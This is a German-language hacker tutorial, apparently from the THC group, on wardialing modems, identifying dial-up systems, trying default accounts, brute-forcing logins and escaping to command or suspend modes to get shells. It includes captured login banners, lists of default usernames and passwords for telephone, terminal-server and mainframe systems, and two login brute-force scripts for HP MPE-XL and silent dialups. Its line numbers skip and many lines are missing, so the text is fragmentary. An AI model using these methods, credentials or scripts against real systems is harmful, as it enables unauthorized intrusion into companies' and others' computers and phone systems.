14 Warum Carrier Scanning/Hacking
\r
15 ------------------------------
\r
17 In der heutigen Zeit ist der Zugang zum Internet im Vergleich zu den USA
\r
18 sehr teuer, also kann man sich andere Wege suchen die eigenen Wege zu senken.
\r
19 Zum Beispiel mit einer 0130 gebuehrenfreien Nummer der Telekom.
\r
20 Es reicht ja schon wenn man ein Tymnet, Datex-P oder Sprintnet Dial-up findet
\r
21 und sich von dort aus zu einen Provider weiterverbinden laesst wie Compuserve,
\r
22 IBM-NET oder Aol. Mit etwas Glueck findet man einen Outdial womit man sich
\r
23 dann weiter verbinden lassen kann. Oder man findet zugang zu Telnet, TN3270,
\r
24 FTP, PPP, SLIP, Telenet, Datapac, Telepac, Decnet, X25, etc...
\r
25 Aber auch zum Zeitvertreib kann man sich z.B. einige oeffentliche BBS (oder
\r
26 nicht-oeffentliche in die man sich social-engineered) einloggen und mit
\r
27 Kumpels leicht Software austauschen oder man versucht herauszufinden, was
\r
28 sich z.B hinter den Grossrechnern des typs HP3000 oder HP MPE-XL verbirgt.
\r
32 Wie findet man Carriers
\r
33 -----------------------
\r
35 Der beste und schnellste Weg ist sie mit einem Wardialer zu scannen.
\r
36 (thc-scan, toneloc, a-dial). Man kann mit diesen Programmen einen bestimmten
\r
37 Bereich von Telefonnummern durchscannen lassen, wo man viel interessantes
\r
38 finden kann, uns aber speziell hier die gefundenen Modems interessieren.
\r
39 Der Scanner hat zudem den Vorteil, dass er die heufigsten emulationen, parity,
\r
40 data length, stop bits, ausprobiert sowie breaks sendet, <cr>, <.> etc. und
\r
41 schliesslich gefundene Rufnummer mit dem Text, den das gefundene Modem
\r
42 ausgibt in einer Logdatei speichert.
\r
43 Es ist von grossem Vorteil wenn das Scan-Modem die VOICE Antwort unterstuetzt,
\r
44 da man so mit bis zu 900% die Geschwindigkeit des Abscannens steigern kann.
\r
48 Was sind Silent Carriers
\r
49 ------------------------
\r
51 Sehr oft bekommt man einen Connect aber nichts passiert - aber irgendein System
\r
52 muss ja dahinter sein. Entweder man benutzt eine falsche Terminal Emulation,
\r
53 oder die Baudrate ist zu hoch, oder parity, data length, stop bits sind falsch
\r
55 a) aendert parity, data length, stop bits, auf 7S1, 7S2, 8E2, 8E1.
\r
56 die meisten Systeme benutzten 8N1, 7E1 und 7O1.
\r
57 b) aendert die Terminal emulation:
\r
59 IBM 3101 TV 910 BEEHIVE ATL078
\r
60 IBM PC/FTTERM COLOR LS ADM3A UDT01
\r
61 IBM PC/FTTERM MONO ADDS VP UDT02
\r
62 IBM 3161/62/63 HAZEL 1500 UDT03
\r
63 IBM 3151 HAZEL ESP I UDT04
\r
64 IBM 3164 HAZEL ESP II UDT05
\r
65 VT52 NT DISPLAY ANSI
\r
66 VT100 TT 5410 ANSI-BBS
\r
68 FALCO 500 HP 2621B Qmodem Pro unterstuetzt
\r
69 WYSE 50 DG D210 diese Emulationen
\r
71 c) aendert die baudrate auf 300, 600, 1200 probiert alles was euer Terminal
\r
72 Programm unterstuetzt.
\r
73 d) drueckt oefters hinter einander, <cr>, esc, .' sendet mehrere breaks,
\r
74 e) Manchmal kommt es auch einfach vor das Modems nicht miteinander auskommen,
\r
75 und dann keinen output anzeigen. Zum optimalen Scannen eignet sich am
\r
76 besten ein Zyxel und ein USR Courier, aeltere Modelle reichen.
\r
77 f) im Anhang ist ein Login Hacker Script fuer Silent Carriers bei denen a bis e
\r
82 Ich habe ein System gefunden
\r
83 ----------------------------
\r
85 Jetzt muss man erst einmal wissen was fuer ein System man gefunden hat.
\r
86 Dazu eine Liste mit System Namen und standart Accounts im zweiten Teil.
\r
87 Dann kann man z.B. alle standart Accounts durchprobieren.
\r
88 Wenn man den Betreiber des Systemes kennt, z.B eine Firma, dann sollte
\r
89 man deren Produkte oder Mitarbeiter Namen als login und Password
\r
90 versuchen. Wenn das alles nichts hilft bleibt nur noch Brute Force
\r
91 Hacking uebrig. Man probiert mit einem programm alle moeglichen
\r
92 Kompinationen, Buchstaben und Zahlen an dem System aus. Am besten man
\r
93 macht das an einem System wo man endlos eingabe versuche hat. Ein gutes
\r
94 Programm dafuer ist der Thc-Login Hacker, man kann ihn an jedes beliebige
\r
95 System anpassen weil er mit Script Technik arbeitet. Ein Beispielscript
\r
96 gibts dazu im Anhang.
\r
100 Suspend/Command Modus
\r
101 ---------------------
\r
103 Manche Firmen haben ihre dialups echt gut gesichert. Unknackbare Passwoerter
\r
104 etc. etc. - nur haben sie vielleicht etwas uebersehen :
\r
105 Viele Programme haben einen "Command Mode", wo man obwohl das Programm laeuft
\r
106 noch Einstellungen veraendern kann. Ein typisches Beispiel ist z.B. beim
\r
107 Modem das "+++" wo man dann Modem Kommandos eingeben kann, und dann mit "AT O"
\r
108 die Verbindung weiter benutzen kann. Andere Programme lassen sich in den
\r
109 Hintergrund suspenden und man kann eine shell bekommen (z.B. bei unix)
\r
110 Wie findet man solche Command/Suspend Modes? Sendet ein -BREAK-, ^Z, ^], ^+
\r
111 sowie alle weiteren Control-Codes von ^A ueber ^Z bis ^] (01 bis 29).
\r
112 Was kann man in solchen Modi machen? Nun das haengt vom Programm ab das so
\r
113 einen Command modus bietet oder das System was einen das Programm suspenden
\r
114 laesst. Bei Unix z.B. hat man eine shell, mit Glueck sogar eine root shell,
\r
115 also jackpot. Bei dem Dienstprogramm telnet auf unix, oder auch manche
\r
116 Dec-Server und Ascend Dialups kommt man in einen command modus wo man z.B.
\r
117 einen telnet, ping oder sogar ppp machen kann - kann also so das Netzwerk
\r
118 abscannen oder sogar hacken.
\r
122 Sonderfall: Internet
\r
123 --------------------
\r
125 Besonders interessant sind Rechner die am Internet angeschlossen sind.
\r
126 Bei manchen Connects sieht man z.B. eine IP Adresse, bei anderen den vollen
\r
127 hostname + domain. Damit kann man z.B. problemlos herausfinden in welchem
\r
128 Netz die sind (traceroute, broadcast pings, etc.) und versuchen vom Internet
\r
129 in den Host oder das Netzwerk hineinzukommen.
\r
130 Falls man nur den hostname sieht kann man sich von ftp.nw.com (Netwizards)
\r
131 die gesamten ping-baren hosts aller domains holen, z.B. der .com domain und
\r
132 darin leicht mit einem grep schauen zu welchem Netzwerk der Rechner gehoert.
\r
133 Falls er nicht in den Listen ist oder aber bei hostname+domain mit ping oder
\r
134 traceroute nicht zu erreichen ist, ist er entweder nicht angeschlossen, oder
\r
135 aber hinter einer Firewall, also wenn man nicht wirklich gut im hacking ist
\r
136 die Finger davon lassen.
\r
138 -------------------------------capture----------------------------------------
\r
139 CONNECT 14400/ARQ/MNP5
\r
141 Connected to 192.354.24.5
\r
142 Escape character is '^]'.
\r
144 UNIX(r) System V Release 4.0 (sisy500)
\r
147 -------------------------------capture----------------------------------------
\r
151 Systeme mit standart Accounts
\r
152 -----------------------------
\r
154 ------------------------------------------------------------------------------
\r
155 DECserver Communications Server
\r
157 DECserver 90TL Communications Server V1.1 (BL44-10) - LAT V5.1
\r
159 Local -010- Session 1 to ZYNET1 established
\r
164 Local -011- Session 1 disconnected from ZYNET1
\r
172 Eine Beschreibung von Dec-Servern in Hinsicht auf Outdials siehe THC-MAG2
\r
173 ------------------------------------------------------------------------------
\r
174 Xyplex Terminal Server.
\r
183 ------------------------------------------------------------------------------
\r
185 Annex Command Line Interpreter * Copyright 1991 Xylogics, Inc
\r
187 Checking authorization, Please wait...
\r
188 Annex username: (Enter your NCI userid)
\r
189 Annex password: (Enter your NCI password)
\r
193 Befehl Parameter Beschreibung
\r
194 ---------------------------------------------------
\r
196 bg bg [-dq] [%][%,+,-,,] :Eine Aktion in Hintergrund setzen
\r
197 fg fg [-q] [%][%,+,-,,] :zurueck zu einer aktuellen Aktion
\r
198 hangup hangup [-q] :Auflegen und Port reseten
\r
199 help help [] :Hilfe
\r
200 jobs jobs :Zeigt aktuelle Aktionen an
\r
201 kill kill [%][%,+,-,,]... :Kille eine Aktion
\r
202 stty stty [parameter [value]]... :Show/Set Annex Port Parameter
\r
203 telnet telnet [-rsst] [ [port]] :Starte Telnet Connection
\r
204 who who [[-l] []@ ...] :Zeigt System User
\r
209 ------------------------------------------------------------------------------
\r
211 ROLM PhoneMail 9252 9254 Microcode Version 5.2
\r
213 Valid login modes are:
\r
219 ROLM PhoneMail 9252 9254 Microcode Version 5.2
\r
220 Copyright (C) ROLM Systems 1991
\r
221 All Rights Reserved.
\r
224 ( Mit den Befehl "?" oder help kommt man zum folgenden menue)
\r
226 The following commands are valid:
\r
227 Activate <session #> - Activate the session
\r
228 Broadcast - Broadcast a message to all terminals
\r
229 Connect <subsystem> <node #> - Invoke the subsystem
\r
230 Terminate <session #> - Terminate the session
\r
231 List - List all open sessions
\r
232 Logout - Terminate all sessions and log off.
\r
233 Login <login mode> - Logout and login again.
\r
234 Display - Display sessions status on a site.
\r
235 TechView <on/off> - Enable/Disable TechView training.
\r
236 ------------------------------------------------------------------
\r
237 Beschreibung aus TFC05:
\r
239 ActivatePM : Starts the Phone Mail system.
\r
240 AssignClasses : External program to assign COS to each user in the
\r
241 database. Only local non-Call Processing users are
\r
243 BackupDataBase : Create a backup of the customer database on HD or
\r
245 BackupNames : Copies name header information for all subscribers to
\r
247 CallProcessing : An external program to create and maintain Mailbox
\r
249 ChannelTrace : Lists the current state of each channel. Continously
\r
250 updates until interrupted.
\r
251 DeactivatePM : Turn off PM system. DON'T USE THIS UNLESS YOU ARE
\r
252 VERY SURE OF WHAT YOU ARE DOING! Calls will no
\r
253 longer be taken by the PM if it is deactivated.
\r
254 DList : Show distribution lists.
\r
255 FFormat : Format a floppy disk. The single most useless command
\r
257 LogOff : Quit session and go to session manager menu.
\r
258 MonitorLogon : Monitor users logging in to PM.
\r
259 MonitorTapLink : Shows tap traffic on CBX integrated systems. Continues
\r
260 to update until interrupted.
\r
261 OCConfigAndTest : Utility to configure and test all outcalling
\r
262 related parameters.
\r
263 Profile : Add All Clear Delete Fix List Modify Purge
\r
264 Reports : Display reports.
\r
265 CallActivity : Displays call activity by the hour, with averages.
\r
271 poll poll oder tech
\r
272 tech tech oder operator
\r
275 Eine genaue Beschreibung ueber dieses System giebt es in TFC #5
\r
276 ------------------------------------------------------------------------------
\r
280 ROLM CBXII RELEASE 9004.2.34 RB295 9000D IBMHO27568
\r
281 BIND DATE: 7/APR/93
\r
282 COPYRIGHT 1980, 1993 ROLM COMPANY. ALL RIGHTS RESERVED.
\r
283 ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.
\r
284 YOU HAVE ENTERED CPU 1
\r
285 12:38:47 ON WEDNESDAY 2/15/1995
\r
291 INVALID USERNAME-PASSWORD PAIR
\r
300 ------------------------------------------------------------------------------
\r
302 ARC NetBlazer Version 2.1
\r
312 ------------------------------------------------------------------------------
\r
314 Telebit's NetBlazer Version 2.0x5
\r
324 ------------------------------------------------------------------------------
\r
328 %SECURE-I-NET, Incoming number logged by Secure-net
\r
332 Welcome to VAX 8650
\r
355 ------------------------------------------------------------------------------
\r
360 Expected [session name,] user.acct [,group]. (CIERR 1424)
\r
361 MPE XL:hello mgr.sys
\r
362 ENTER ACCOUNT (SYS) PASSWORD:
\r
363 ENTER ACCOUNT (SYS) PASSWORD:
\r
364 ENTER ACCOUNT (SYS) PASSWORD:
\r
370 HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP
\r
423 Ein Login Hacker Script gibt es im Anhang
\r
424 ------------------------------------------------------------------------------
\r
434 Software Version: G3s.b16.2.2
\r
436 Terminal Type (513, 4410, 4425): [513]
\r
445 browse looker, browsepw
\r
446 craft crftpw, craftpw, crack
\r
450 inads indspw, inadspw, inads
\r
454 maint maintpw, rwmaint
\r
459 ------------------------------------------------------------------------------
\r
462 IBM AIX Version 3 for RISC System/6000
\r
463 (C) Copyrights by IBM and by others 1982, 1990.
\r
469 ------------------------------------------------------------------------------
\r
490 ------------------------------------------------------------------------------
\r
493 Systeme ohne Standart Accounts
\r
494 ------------------------------
\r
498 WELCOME TO THE NOS SOFTWARE SYSTEM.
\r
499 COPYRIGHT CONTROL DATA 1978, 1987.
\r
501 88/02/16. 02.36.53. N265100
\r
502 CSUS CYBER 170-730. NOS 2.5.2-678/3.
\r
505 You would normally just hit return at the family prompt. Next prompt is:
\r
508 ------------------------------------------------------------------------------
\r
512 cisco_router_1> (kann jeder beliebige Promt sein)
\r
513 cisco_router_1>LOGIN
\r
516 ------------------------------------------------------------------------------
\r
520 WELCOME TO CITIBANK. PLEASE SIGN ON.
\r
528 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
\r
530 PLEASE ENTER YOUR ID:-1->
\r
531 PLEASE ENTER YOUR PASSWORD:-2->
\r
533 CITICORP (CITY NAME). KEY GHELP FOR HELP.
\r
535 PLEASE SELECT SERVICE REQUIRED.-3->
\r
536 ------------------------------------------------------------------------------
\r
538 Lantronix Terminal Server
\r
540 Lantronix ETS16 Version V3.1/1(940623)
\r
542 Type HELP at the 'Local_15> ' prompt for assistance.
\r
545 ------------------------------------------------------------------------------
\r
549 NIH Tri-SMP 7.02-FF 16:30:04 TTY11
\r
550 system 1378/1381/1453 Connected to Node Happy(40) Line # 12
\r
553 ------------------------------------------------------------------------------
\r
557 TBVM2 VM/ESA Rel 1.1 PUT 9200
\r
559 Fill in your USERID and PASSWORD and press ENTER
\r
560 (Your password will not appear when you type it)
\r
565 ------------------------------------------------------------------------------
\r
571 Login Hacker Scripts:
\r
572 ---------------------
\r
577 ; ------------------------------------------------------------------------
\r
578 ; HP MPE-XL : SAC-Script for THC-Login-Hacker v1.0 (by van Hauser)
\r
579 ; ------------------------------------------------------------------------
\r
583 ; EXPECTED A :HELLO COMMAND. (CIERR 6057)
\r
585 ; EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424)
\r
588 =============================================================================
\r
594 DIC(1)=hp_mpe_a.dic
\r
595 ; uncomment command lines below to check for 6 more common MPE passwords
\r
598 LOG(CARRIER LOST on $DATE at $TIME)
\r
604 LOG(--------------------------------------------------------------------------)
\r
605 LOG( TARGET : $PHONE_NR )
\r
606 LOG( DATE : $DATE )
\r
607 LOG( TIME : $TIME )
\r
617 IF STRING~XL THEN GOTO(2)
\r
618 WAIT4STRING(2,^M,6,GOTO(1),XL)
\r
624 IF D_TMP=1 THEN SEND_(ADVMAIL.)
\r
625 IF D_TMP=2 THEN SEND_(FIELD.)
\r
626 IF D_TMP=3 THEN SEND_(MAIL.)
\r
627 IF D_TMP=4 THEN SEND_(MANAGER.)
\r
628 IF D_TMP=5 THEN SEND_(MGE.)
\r
629 IF D_TMP=6 THEN SEND_(MGR.)
\r
630 IF D_TMP=7 THEN SEND_(OP.)
\r
631 IF D_TMP=8 THEN SEND_(OPERATOR.)
\r
632 IF D_TMP=9 THEN SEND_(PCUSER.)
\r
633 IF D_TMP=10 THEN SEND_(RSBCMON.)
\r
634 IF D_TMP=11 THEN SEND_(SPOOLMAN.)
\r
635 IF D_TMP=12 THEN SEND_(SYS.)
\r
636 IF D_TMP=13 THEN SEND_(WP.)
\r
638 IF S_TMP=X THEN SEND_NEXT_DIC(1)
\r
639 IF S_TMP=Y THEN SEND_DIC(1)
\r
640 IF S_TMP=Z THEN SEND_DIC(1)
\r
641 IF S_TMP=A THEN SEND_DIC(1)
\r
642 ; IF S_TMP=B THEN SEND_DIC(1)
\r
643 ; IF S_TMP=C THEN SEND_DIC(1)
\r
645 IF D_TMP=13 THEN SET S_TMP=X
\r
646 IF D_TMP=13 THEN SET D_TMP=1
\r
648 ; set this higher if the system response is slow
\r
649 IF STRING2~HELLO THEN GOTO(3)
\r
650 IF STRING2~exists THEN GOTO(3)
\r
651 IF STRING2~on-ex THEN GOTO(4)
\r
652 IF STRING2~ASSW THEN GOTO(5)
\r
654 IF STRING2~HELLO THEN GOTO(3)
\r
655 IF STRING2~exists THEN GOTO(3)
\r
656 IF STRING2~on-ex THEN GOTO(4)
\r
657 IF STRING2~ASSW THEN GOTO(5)
\r
669 IF S_TMP=Z THEN GOTO(6)
\r
670 IF S_TMP=A THEN GOTO(7)
\r
671 ;IF S_TMP=B THEN GOTO(8)
\r
672 ;IF S_TMP=C THEN GOTO(9)
\r
755 LOG( END OF : $PHONE_NR )
\r
756 LOG(--------------------------------------------------------------------------)
\r
762 [BEGIN hp_mpe_a.dic]
\r
814 ; ------------------------------------------------------------------------
\r
815 ; Silent Dialups : SAC-Script for THC-Login-Hacker v1.0 (by van Hauser)
\r
816 ; ------------------------------------------------------------------------
\r
818 ; Silent Dialups : No output/response from dialup modem
\r
819 ; (both types, 30 sec hangup & unlimited)
\r
821 ; (takes approx. 9-10 hours)
\r
824 =============================================================================
\r
831 ; tries every combination of Controll-Chars and Misc. Chars from 1 to 3 length.
\r
835 LOG(CARRIER LOST on $DATE at $TIME)
\r
842 LOG(--------------------------------------------------------------------------)
\r
843 LOG( TARGET : $PHONE_NR )
\r
844 LOG( DATE : $DATE )
\r
845 LOG( TIME : $TIME )
\r
857 ;waits 255ms between every attempt
\r
864 ;waits 255ms between every attempt
\r
870 CHECK4CARRIER(#NOCARRIER)
\r
879 LOG( FOUND : $BRUTE(1))
\r
880 LOG(--------------------------------------------------------------------------)
\r